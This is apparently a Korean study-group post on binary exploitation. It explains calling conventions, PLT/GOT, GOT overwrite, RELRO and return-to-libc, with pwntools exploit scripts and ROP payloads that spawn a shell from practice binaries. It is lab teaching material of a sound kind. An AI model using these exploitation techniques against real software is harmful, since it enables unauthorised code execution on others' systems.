[ASC 스터디] 9주차 - Return to Library(RTL)

👉 지난 차시

2022.08.19 - [System-hacking/📖] - [ASC 스터디] 8주차 - Stack Canary + Out Of Boundary

 

1. Return To Libc ( RTL )

살짝 어려울 수 있다 !

1.1. 함수호출 규약( Calling Convention )

: 함수를 호출하는 방식에 대한 약속

함수 호출 규약은 인자 전달 방법, 인자 전달 순서, Stack Frame을 정리하는 방법에 따라 그 종류를 구분한다.

 

함수호출규약 참고 > 

함수호출규약

 

- 32bit : cdecl, stdcall, fastcall

  cdecl

  함수 호출용으로 스택에 쌓은 파라미터를 호출한 함수(Caller)에서 정리하는 규약이다.

 

- 64bit : fastcall

  fastcall

  함수에 전달하는 파라미터를 레지스터로 전달한다. ( 더 빠르게 호출 가능 )

  64bit 리눅스 시스템에서 정수는 RDI, RSI, RDX, RCX, R8, R9. 실수는 XMMO~XMM7 레지스터를 사용.

 

1.2. Static Linking vs Dynamic Linking

소스코드 컴파일  =>  오브젝트 파일 생성  =>  링킹

 

• Static Linking
  • 모든 라이브러리를 포함
  • 따로 라이브러리를 관리할 필요가 없음
  • 파일 크기가 엄청 커짐

• Dynamic Linking
  • 라이브러리를 하나의 메모리 공간에 매핑해 여러 프로그램에서 공유해서 사용
  • 파일 크기가 작고 실행시 메모리 공간을 적게 차지
  • /lib/x86_64-linux-gnu/libc.so.6

 

[ OS ] 13. 메모리 관리 전략 - Static Linking vs Dynamic Linking

 

컴파일시 -static 옵션 줌

file 명령어로도 확인 가능

 

1.3. PLT  vs  GOT

• PLT(Procedure Linkage Table)
  • 외부 프로시저를 연결해주는 테이블
  • PLT를 통해 다른 라이브러리에 있는 프로시저를 호출해 사용
  • 즉 외부 라이브러리를 연결해주는 역할
  • 처음 호출이라면 '_dl_runtime_resolve' 호출
  • 처음 호출이라 GOT영역에 라이브러리 실제 주소가 써있지 않다

• GOT(Global Offset Table)
  • PLT가 참조하는 테이블
  • 프로시저의 주소가 들어있다.
  • GOT에는 외부 라이브러리 주소를 저장한다.

( 라이브러리 함수 처음 호출 )

1. PLT 참조

2. PLT = &got

3. _dl_runtime_resolve 함수 실행

 

( 라이브러리 함수 두번째 이후 호출 )

1. PLT 참조

2. PLT = &got

3. GOT = &Library Function Address

4. 함수 실행

 

1.4. GOT Overwrite

: Dynamic Link 방식으로 컴파일된 바이너리가 공유 라이브러리를 호출할 때 사용되는 PLT&GOT를 이용하는 공격 기법

( PLT Overwrite도 있나요?  ==>  PLT는 코드 영역으로 Read Only라 Overwrite가 불가능하다. )

 

(원리)

PLT는 GOT를 참조하고, GOT에는 함수의 실제 주소가 들어있다.

이 GOT의 값을 원하는 함수의 주소로 변조시킨다면, 원래의 함수가 아닌 변조한 함수가 호출된다.

printf("ls -al");
printf@got -> system(); 변조
system("ls -al");

 

문제 풀이1 : got_overwrite

문제

IDA

printf -> read -> printf -> scanf -> printf 호출

마지막 printf 함수에서 printf("/bin/sh")을 하고 있으므로, 

printf 함수의 got를 system함수의 got 주소로 overwrite하면 되겠다.

 

주의해야할점 : scanf("%ld") 형식 맞춰서 int형으로 send 해야된다.

 

익스플로잇

1. printf 함수의 got 주소를 알아낸다.

0x601028

2. system 함수의 got 주소를 알아낸다.

0x7ffff7e15290

3. printf 함수의 got 주소를 system 함수의 got 주소로 덮는다.

from pwn import *

context.log_level = 'debug'

e = ELF('./got_overwrite')
p = process('./got_overwrite')

printf_plt = e.plt['printf']
printf_got = e.got['printf']

p.sendlineafter(b'Address : ', p64(printf_got))
p.recvuntil(b'Value : ')

pause()
system_addr = int(e.symbols["system"])
print(system_addr)


p.sendline(str(system_addr))

p.interactive()

 

1.5. RELRO (RELocation Read-Only)

"GOT Overwrite 공격에 대비하여 ELF 바이너리 또는 프로세스의 데이터 섹션을 보호하는 기술"

메모리 특정 영역을 덮어 쓸 수 없도록 한다.

 

PARTIAL-RELRO : ctors, dtors, dynamic Section Read-Only

FULL-RELRO : got Section Read-Only ( GOT Overwrite 못 함 )

 

컴파일 옵션

-z norelro (NO-RELRO)
-z relro (PARTIAL-RELRO)
-z relro -z now (FULL-RELRO)

 

FULL-RELRO일 때 readonly

 

1.6. RTL (Return To Libc)

"리턴 주소를 라이브러리 내에 존재하는 함수의 주소로 바꿔 NX bit를 우회하는 공격 기법"

 

NX bit는 Stack, Heap 등의 영역에 실행권한을 주지 않는 것이다.

이제 이전처럼 쉘코드를 올려서 실행할 수 없다.

=> 메모리에 미리 적재되어 있는 공유 라이브러리를 이용하자.

 

문제 풀이2 : rtl32_1

• 익스플로잇

payload = 'A'*sizeof(BUF)
payload += 'B'*4 # SFP (Stack Frame Pointer)
payload += p32(system) # RET
payload += 'C'*4 # dummy <- system ret
payload += p32(*/bin/sh)

system과 /bin/sh 사이에 dummy를 넣는 이유는 dummy 4바이트 위치가 system함수의 리턴값이다.

system@plt가 호출되고 리턴되는 곳 $eip = 0x43434343 (CCCC)

 

문제 풀이3 : rtl64_1

• 64bit 함수 호출 규약

- 함수의 파라미터를 전달할 때 레지스터를 이용

- RDI, RSI, RDX, RCX 순으로 들어감

- ex) read(0, buf, sizeof(buf))

- $RDI=0, $RSI=&buf, $RDX=sizeof(buf)

 

• Gadget

코드 조각들을 의미한다.

ex) pop ret; jmp eax;

리턴 어드레스를 바꿔버릴 수 있다면 코드 조각을 넣어서 체이닝 한다.

 

• Gadget 찾는 방법
  • ROPgadget설치
    • GitHub - JonathanSalwan/ROPgadget:
  •  $ROPgadget --binary [filename] | grep "pop rdi; ret"

가젯들

 

• 익스플로잇

( IDA 분석 )

shift + f12 : 파일 내에 있는 문자열 확인

something()함수에서 system("echo hi~") 수행

( 익스플로잇 개요 )

1. main함수에서 Buffer Overflow 발생

2. something()함수에서 system("echo hi~") 수행

3. system@plt, &"/bin/sh", &pop rdi; ret; 가젯을 이용해 익스플로잇

 

system@plt

/bin/sh 스트링 검색을 통해 주소 알아내기

pop rdi; ret

 

from pwn import *

e = ELF('./rtl64_1')
p = process('./rtl64_1')

prdi = 0x0000000000400773 # pop rdi ; ret
binsh = 0x0000000000400794 # /bin/sh string

pay = b'A'*0x30 # 버퍼 채우기
pay += b'B'*8 # sfp
pay += p64(prdi) # ret
pay += p64(binsh)
pay += p64(0x4006c2) #  0x00000000004006C2

pause()
p.sendafter(b'Input > ', pay)

p.interactive()

 

 

⭐공부할 것들

1. RTL문제풀이 참고,  Exploit Tech: Return to Library | Dreamhack

2. Gadget

 

 

 

---

ASC 시스템해킹 스터디